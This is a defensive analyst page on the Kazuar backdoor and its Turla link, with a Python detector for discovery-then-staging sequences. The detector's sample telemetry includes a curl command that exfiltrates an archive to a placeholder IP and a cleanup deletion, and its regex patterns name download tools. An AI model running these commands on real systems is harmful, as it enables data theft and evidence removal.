S0265: Kazuar
Analyst context for executives and security teams
Kazuar matters because ATT&CK describes it as a fully featured, multi-platform backdoor Trojan for Windows and macOS, with relationships showing discovery, command execution, collection, staging, command-and-control, and exfiltration-related behaviors. For leaders, the practical issue is not only “malware detection,” but whether the organization can prove it would notice a backdoor mapping users, files, processes, network settings, and local permissions before moving data or receiving further tools.
Executive priority
Treat this as a coverage-validation use case for endpoint, network, and incident response readiness across Windows and macOS. Priority questions: do we collect enough host and network evidence to reconstruct discovery and C2 activity; can the SOC distinguish legitimate administration from suspicious WMI, shell, and discovery behavior; and can IR quickly scope local data staging, tool transfer, and potential exfiltration paths? The ATT&CK relationship to Turla increases threat-intelligence relevance, but local exposure and prioritization should be based on observed telemetry and business-critical assets.
Technical view
Kazuar has no official ATT&CK detection text, so defenders should validate coverage through the related techniques rather than rely on a single signature. On Windows, prioritize visibility into .NET process behavior, WMI execution, command shell activity, DLL injection indicators, file deletion, local account/group discovery, process discovery, and file/directory enumeration. On macOS, validate Unix shell execution, user/system/network discovery, file discovery, local data collection, staging, and outbound C2-like traffic. Network teams should review visibility for web protocols, file transfer protocols, fallback channels, internal proxy behavior, bidirectional web-service communication, and ingress tool transfer. IR playbooks should connect host discovery events to possible local data staging and scheduled transfer/exfiltration patterns.
Likely telemetry
- Endpoint process creation and command-line telemetry for Windows and macOS
- Windows WMI activity and administrative execution logs
- DLL/module load, process injection, and suspicious process access telemetry where available
- File creation, modification, staging, and deletion events
- Local account, group, user, process, system, network configuration, file, and directory discovery evidence
Detection direction
- Map detections to the related ATT&CK techniques instead of treating Kazuar as a single malware signature, especially because official detection guidance is not provided.
- Tune for sequences: discovery of users/processes/files/network settings followed by staging, outbound web or file-transfer traffic, tool transfer, or cleanup through file deletion.
- Separate legitimate administration from suspicious use of WMI, Windows command shell, Unix shell, and local account/group discovery by baselining admin hosts, service accounts, timing, and target systems.
- Validate Windows and macOS parity; the object is multi-platform, and endpoint visibility gaps on either platform can create blind spots.
- Correlate host telemetry with network telemetry for web protocols, file transfer protocols, fallback channels, internal proxy behavior, and bidirectional web-service communication.
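The sequence-tuning and baselining points above can be made concrete. The following Python is an added illustration written for this page, not Glexia's or MITRE's detection content and not Kazuar code: it correlates per-host process-creation events so that a burst of distinct discovery families (users, groups, processes, network settings, files) followed within a window by staging, tool transfer or file cleanup raises one alert, and known admin/service-account hosts are downgraded rather than silently suppressed. Host names, accounts, timestamps, command-line regexes, the 30-minute window, the three-family threshold, the baseline set and the documentation IP address are all assumptions to be replaced with local telemetry and baselines.

```python
"""Kazuar-style discovery-then-staging sequence detector (added illustration).

Field names, regexes, window, threshold and the admin baseline are assumptions.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Illustrative command-line patterns for the Windows and macOS tooling named on
# this page.  Assumed for the example; not a vendor or MITRE rule set.
PATTERNS = {
    "discovery:user":    re.compile(r"\b(whoami|net\s+user|dscl\s.*-list\s+/Users|id)\b", re.I),
    "discovery:group":   re.compile(r"\b(net\s+localgroup|dscl\s.*-list\s+/Groups|groups)\b", re.I),
    "discovery:process": re.compile(r"\b(tasklist|ps\s+-?[aefux]+|Get-Process)\b", re.I),
    "discovery:network": re.compile(r"\b(ipconfig|ifconfig|netstat|arp\s+-a|route\s+print)\b", re.I),
    "discovery:file":    re.compile(r"\b(dir\s+/s|tree|find\s+/\S*\s+-name|Get-ChildItem\s+-Recurse)\b", re.I),
    "staging":  re.compile(r"\b(Compress-Archive|7z\s+a|rar\s+a|zip\s+-r|tar\s+-?c\w*f|ditto\s+-c)\b", re.I),
    "transfer": re.compile(r"\b(curl|wget|certutil\s.*-urlcache|bitsadmin\s.*/transfer|Invoke-WebRequest)\b", re.I),
    "cleanup":  re.compile(r"\b(del\s+/[fq]|rm\s+-rf?|srm|sdelete)\b", re.I),
}
FOLLOW_ON = {"staging", "transfer", "cleanup"}
WINDOW = timedelta(minutes=30)   # assumed correlation window
MIN_DISCOVERY_FAMILIES = 3       # assumed: distinct discovery families required before a follow-on
# Assumed baseline of (host, account) pairs where discovery plus archiving is
# routine (inventory or backup jobs).  Hits there are downgraded, not hidden.
ADMIN_BASELINE = {("jumpbox01", "svc_inventory")}


def classify(cmdline):
    """Return the set of behaviour families one command line matches."""
    return {name for name, rx in PATTERNS.items() if rx.search(cmdline)}


def detect_sequences(events):
    """events: dicts with host, user, ts (ISO 8601) and cmdline.  One alert per
    host per window: >= MIN_DISCOVERY_FAMILIES distinct discovery families, then a
    staging/transfer/cleanup action within WINDOW; later follow-ons are merged."""
    by_host = defaultdict(list)
    for e in events:
        fams = classify(e["cmdline"])
        if fams:
            by_host[e["host"]].append((datetime.fromisoformat(e["ts"]), e["user"], fams, e["cmdline"]))
    alerts = []
    for host, evs in by_host.items():
        evs.sort(key=lambda ev: ev[0])
        i = 0
        while i < len(evs):
            ts, user, fams, cmd = evs[i]
            follow = fams & FOLLOW_ON          # new set; fams itself is untouched
            seen = set()
            for pts, _, pfams, _ in evs[:i]:   # discovery families preceding this event
                if follow and ts - pts <= WINDOW:
                    seen |= {f for f in pfams if f.startswith("discovery:")}
            if follow and len(seen) >= MIN_DISCOVERY_FAMILIES:
                j = i
                while j < len(evs) and evs[j][0] - ts <= WINDOW:   # merge follow-ons in window
                    follow |= evs[j][2] & FOLLOW_ON
                    j += 1
                alerts.append({
                    "host": host, "user": user, "time": ts.isoformat(), "trigger": cmd,
                    "discovery": sorted(seen), "follow_on": sorted(follow),
                    "severity": "baseline" if (host, user) in ADMIN_BASELINE else "high",
                })
                i = j
            else:
                i += 1
    return alerts


def _ev(host, user, ts, cmd):
    return {"host": host, "user": user, "ts": f"2024-05-14T{ts}", "cmdline": cmd}

# Constructed sample telemetry (not real logs); 203.0.113.5 is a documentation address.
SAMPLE_EVENTS = [
    _ev("ws-finance-07", "jdoe", "10:00:00", "whoami /all"),
    _ev("ws-finance-07", "jdoe", "10:02:00", "net user"),
    _ev("ws-finance-07", "jdoe", "10:03:00", "net localgroup administrators"),
    _ev("ws-finance-07", "jdoe", "10:04:00", "tasklist /v"),
    _ev("ws-finance-07", "jdoe", "10:20:00", r"powershell -c Compress-Archive -Path C:\Users\jdoe\Documents -DestinationPath C:\Windows\Temp\a.zip"),
    _ev("mac-eng-12", "asmith", "09:00:00", "id"),
    _ev("mac-eng-12", "asmith", "09:02:00", "ps aux"),
    _ev("mac-eng-12", "asmith", "09:03:00", "ifconfig"),
    _ev("mac-eng-12", "asmith", "09:04:00", "find /Users/asmith -name *.docx"),
    _ev("mac-eng-12", "asmith", "09:15:00", "tar -czf /tmp/.c.tgz /Users/asmith/Documents"),
    _ev("mac-eng-12", "asmith", "09:16:00", "curl -X POST -d @/tmp/.c.tgz https://203.0.113.5/up"),
    _ev("mac-eng-12", "asmith", "09:17:00", "rm -rf /tmp/.c.tgz"),
    _ev("jumpbox01", "svc_inventory", "02:00:00", "whoami"),
    _ev("jumpbox01", "svc_inventory", "02:00:05", "net localgroup administrators"),
    _ev("jumpbox01", "svc_inventory", "02:00:10", "tasklist"),
    _ev("jumpbox01", "svc_inventory", "02:01:00", r"powershell -c Compress-Archive -Path C:\inv -DestinationPath C:\inv\out.zip"),
    _ev("ws-hr-03", "mlee", "11:00:00", "whoami"),
    _ev("ws-hr-03", "mlee", "11:01:00", "ipconfig /all"),
    _ev("ws-hr-03", "mlee", "11:02:00", "git commit -m fix"),
]

if __name__ == "__main__":
    for a in detect_sequences(SAMPLE_EVENTS):
        print(a["severity"], a["host"], a["user"], a["discovery"], "->", a["follow_on"])
```

Run stand-alone, the sample produces three alerts: two rated high (the finance workstation with staging only, the macOS host with staging, transfer and cleanup) and one downgraded to baseline for the inventory service account on the jump host. The HR workstation produces nothing: two discovery commands with no follow-on action never fire, and a lone `curl` or `whoami` anywhere is not an alert either. That sequence requirement, plus an explicit baseline that downgrades instead of hides, is what lets the rule separate routine administration from the discovery-to-staging chain this page describes.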
Mitigation priorities
- Confirm endpoint protection, logging, and response capability on both Windows and macOS assets, especially high-value systems handling sensitive data.
- Reduce abuse of administrative execution paths by controlling and monitoring WMI, command shells, privileged accounts, and local group membership.
- Strengthen egress governance by monitoring and restricting unnecessary web, file-transfer, proxy, and external web-service communication paths.
- Improve data-loss and incident-response readiness by monitoring local data staging locations, unusual scheduled transfers, and outbound transfer patterns.
- Harden investigative retention: preserve endpoint, proxy, DNS, and firewall logs long enough to reconstruct discovery-to-exfiltration timelines.
Analyst notes and limits
ATT&CK records Kazuar as software S0265 and describes it as a fully featured backdoor Trojan written with the Microsoft .NET framework. The relationship set links it to Turla and to techniques spanning execution, discovery, collection, command-and-control, exfiltration, stealth, and privilege-escalation-related behavior. The most useful defensive value is validating whether telemetry can connect these behaviors into an intrusion narrative rather than relying on a named-malware alert.
The supplied ATT&CK object does not provide official detection guidance, aliases, labels, or explicit tactics on the malware object itself. Technique descriptions are relationship context and include platforms broader than Kazuar’s listed Windows and macOS platforms, so defensive planning should not infer Kazuar platform support beyond Windows and macOS from those technique platform lists. Local environment baselines, asset criticality, and observed indicators are required for prioritization and incident conclusions.
Kazuar
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
Groups, software, and campaigns
G0010: Turla
Turla is a cyber espionage threat group that has been attributed to Russia's Federal Security Service (FSB). They have compromised victims in over 50 countries since at least 2004, spanning a range of industries including government, embassies, military, education, research and pharmaceutical companies. Turla is known for conducting watering hole and spearphishing campaigns, and leveraging in-house tools and malware, such as Uroburos.[1][2][3][4][5]
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE's own release notes and roadmap, see the Updates page under ATT&CK resources.
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | | 1.4 | | Current bundle | bbff460f30d5… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
- [1] Unit 42 Kazuar May 2017. Levene, B., et al. (2017, May 3). Kazuar: Multiplatform Espionage Backdoor with API Access. Retrieved July 17, 2018.
- [2] Kazuar (Citation: Unit 42 Kazuar May 2017)
- [3] mitre-attack S0265
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.